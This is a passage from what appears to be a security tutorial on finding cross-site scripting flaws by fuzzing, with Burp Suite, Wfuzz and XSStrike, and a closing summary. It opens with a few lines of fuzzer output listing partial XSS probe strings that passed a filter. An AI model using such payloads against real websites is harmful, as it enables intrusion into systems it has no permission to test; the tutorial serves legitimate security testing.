[passed]   <iSinDEx x=y//
[passed]   <aUdio x=y>
[passed]   <script x=y>
[passed]   <script//src=//

...

There are many other features included in this tool, and there are sure to be even more as XSStrike undergoes further development.

Wrap Up

Fuzzing is an extremely useful technique for discovering vulnerabilities in a timely and thorough manner. Today, we explored three fuzzing tools in an effort to find XSS flaws in a vulnerable web application: Burp Suite, Wfuzz, and XSStrike. Knowing how to use tools like these will improve your effectiveness as a white hat hacker and lead you on the path to success.

Cover image by markusspiske/Pixabay; Screenshots by drd_/Null Byte